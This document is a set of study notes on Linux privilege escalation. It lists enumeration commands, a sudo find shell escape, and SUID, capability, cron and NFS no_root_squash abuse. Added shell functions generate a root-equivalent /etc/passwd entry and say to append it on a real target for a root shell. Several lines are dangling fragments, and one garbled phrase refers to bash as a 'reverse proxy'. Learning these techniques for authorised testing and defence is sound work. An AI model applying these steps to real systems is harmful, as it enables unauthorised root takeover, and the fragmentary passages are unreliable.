Backdoors & Breaches
An “attack framework” is just a way to describe an attack in a standardized fashion.
The diamond model can be summarized as, “for every intrusion, there exists an adversary who is using their capabilities over/with some kind of infrastructure to attack a victim.”
MITRE ATT&CK is really the gold standard though.
Useful Linux post-exploit enumeration commands
ps auxww (lots and lots of process info)
ps auxfww (process tree)
sudo -l (creates log entries!)
netstat -a (all sockets: listening ports and established connections)
netstat -l (only listening ports)
netstat -s (protocol statistics)
netstat -p (PID and program name owning each socket; requires root to see everything)
netstat -i (per-interface statistics)
The j flag can be used with ps (e.g. ps axj) to get a slightly different column output format. This is mostly useful for finding out numeric user IDs and parent process IDs.
The netstat command supports the -t and -u flags to limit returned ports to TCP and UDP, respectively. Note that by default netstat will try to resolve hostnames, which can cause hangs; use -n to skip this (and only display IP addresses).
Of these, only LES (linux-exploit-suggester) is available in the Kali Linux repos (sudo apt install linux-exploit-suggester).
Sometimes, you can also get applications to leak information about sensitive files (such as /etc/shadow) by passing these as if they were configuration files; the error message then echoes the offending line back. Apache is one app that does this.
reset; sh 1>&0 2>&0
sudo less is as simple as
If find can be run with sudo, then try sudo find . -exec /bin/sh \; -quit.
Find (not always so quickly) SUID files; -perm -04000 matches the setuid bit, -perm -02000 the setgid bit, and -perm /06000 either of them:
find / -type f -perm -04000 -ls 2>/dev/null
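The search above, as an added example that is not part of the original notes: it wraps the find invocation so that both setuid and setgid hits are reported with their octal mode, and adds two small counters for triage. It assumes GNU find (for -printf); the function names are my own.

```shell
# Added example (not from the original notes): enumerate setuid/setgid
# files under a directory tree. -perm -04000 matches files with the
# setuid bit set, -perm -02000 the setgid bit; the -o joins them so a
# single pass reports either.
# Usage: find_special_bits /      (output: one "octal-mode path" per line)
find_special_bits() {
  root="${1:-/}"
  # %m prints the permission bits in octal (e.g. 4755), %p the path.
  # stderr is dropped: an unprivileged user hits many unreadable dirs.
  find "$root" -type f \( -perm -04000 -o -perm -02000 \) \
    -printf '%m %p\n' 2>/dev/null
}

# Triage summaries. The leading octal digit carries the special bits:
# 4 = setuid, 2 = setgid, 1 = sticky, so setuid files start with 4-7
# and setgid files with 2, 3, 6 or 7.
count_suid() {
  find_special_bits "$1" | awk 'substr($1,1,1) ~ /[4567]/ {n++} END {print n+0}'
}
count_sgid() {
  find_special_bits "$1" | awk 'substr($1,1,1) ~ /[2367]/ {n++} END {print n+0}'
}
```

Run it against / on a target; on a known-good box, diff the output against the distribution's expected set, since an unexpected setuid copy of a shell is exactly what the /etc/exports trick further down produces.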
Note that Linux systems still honour a password hash placed directly in the second field of /etc/passwd; the x placeholder is what tells the system to consult /etc/shadow instead. This means that if /etc/passwd is writable we can add root-equivalent users directly here (remember that the UID and primary GID can be duplicated, so UID 0 / GID 0 is fine).
To generate a password hash acceptable for inclusion in /etc/passwd:
openssl passwd -1 -salt $SALT $PASSWORD
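Putting the two notes above together, as an added example that is not from the original notes: a helper that builds a complete root-equivalent passwd line from the openssl hash, plus a check that confirms a copy of the passwd file now carries such an entry. It assumes openssl is installed; the function names, the user name and the sample password are my own.

```shell
# Added example (not from the original notes): build a root-equivalent
# /etc/passwd line carrying a hash the login machinery accepts directly,
# so no /etc/shadow entry is needed. Assumes openssl is available.
# Usage: make_root_passwd_line newuser 'Passw0rd!' ab12
make_root_passwd_line() {
  user="$1"; password="$2"; salt="$3"
  # -1 selects the MD5-crypt ($1$...) scheme; any crypt(3) format works.
  hash=$(openssl passwd -1 -salt "$salt" "$password")
  # Field layout: name:hash:UID:GID:GECOS:home:shell. UID/GID 0 duplicate
  # root's, which the system allows.
  printf '%s:%s:0:0:%s:/root:/bin/bash\n' "$user" "$hash" "$user"
}

# Check a passwd-format file for a root-equivalent entry for user $2:
# UID 0 and a real hash in the second field rather than the "x" that
# defers to /etc/shadow. Exit status 0 when found.
has_root_equivalent() {
  awk -F: -v u="$2" \
    '$1 == u && $2 != "x" && $2 != "" && $3 == 0 { found = 1 }
     END { exit !found }' "$1"
}
```

On a real target the line is appended with something like `make_root_passwd_line hacker 'Passw0rd!' ab12 >> /etc/passwd`, after which `su hacker` gives a root shell; the second function is also a cheap detection for exactly that tampering.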
“Capabilities” are finer-grained permissions that can be assigned to a binary. Think of them as a kind of granular SUID/SGID.
The getcap command displays a binary’s capabilities (if there are any), and can be used to search a whole tree for such binaries with
getcap -r / 2> /dev/null.
For cron jobs, check whether any scripts run by a privileged user can be written to by an unprivileged user.
Also look for “zombie” cron jobs that are still running but refer to a non-existent file in a writable location.
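The two cron checks above, as an added example that is not part of the original notes: it reads a file in system-crontab format (minute hour dom mon dow user command) and flags command paths we can write to, plus "zombie" entries whose target is missing but whose directory we could plant a file in. The function name and the constructed crontab used to exercise it are my own.

```shell
# Added example (not from the original notes): audit the command paths in
# a system-crontab-format file from an unprivileged user's point of view.
#   WRITABLE         target exists and we can modify it
#   ZOMBIE_PLANTABLE target is missing and we can create it
#   ZOMBIE           target is missing and we cannot create it
#   OK               nothing obvious
# Only absolute command paths are examined; arguments are ignored.
# Usage: audit_cron_targets /etc/crontab
audit_cron_targets() {
  while IFS= read -r line; do
    case "$line" in ''|\#*) continue ;; esac      # skip blanks and comments
    # @reboot/@daily lines are "@spec user command"; others have 5 time fields.
    case "$line" in
      @*) cmd=$(printf '%s\n' "$line" | awk '{print $3}') ;;
      *)  cmd=$(printf '%s\n' "$line" | awk '{print $7}') ;;
    esac
    case "$cmd" in /*) ;; *) continue ;; esac      # only absolute paths
    if [ ! -e "$cmd" ]; then
      dir=$(dirname "$cmd")
      if [ -d "$dir" ] && [ -w "$dir" ]; then
        printf 'ZOMBIE_PLANTABLE %s\n' "$cmd"
      else
        printf 'ZOMBIE %s\n' "$cmd"
      fi
    elif [ -w "$cmd" ]; then
      printf 'WRITABLE %s\n' "$cmd"
    else
      printf 'OK %s\n' "$cmd"
    fi
  done < "$1"
}
```

Run it as the low-privilege user you actually have, since -w answers for the calling user; running it as root makes everything look writable. Per-user crontabs under /var/spool/cron have no user column, so they need the @-style field offset minus one, which this version does not handle.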
Bash as a reverse proxy makes an appearance again here.
NFS exports are listed in /etc/exports; if an export is configured with no_root_squash, then root permissions won’t be stripped from files created over the mount, and it’s possible to create root-owned SUID/SGID binaries on the share (mount it from a box where you are root, copy in a shell, chmod 4755, then run it on the target as the unprivileged user). Remember that files on NFS mounts are created using the UID/GID values of the local user! The one caveat is that the share must not be mounted nosuid on the target, or the setuid bit is ignored at exec time.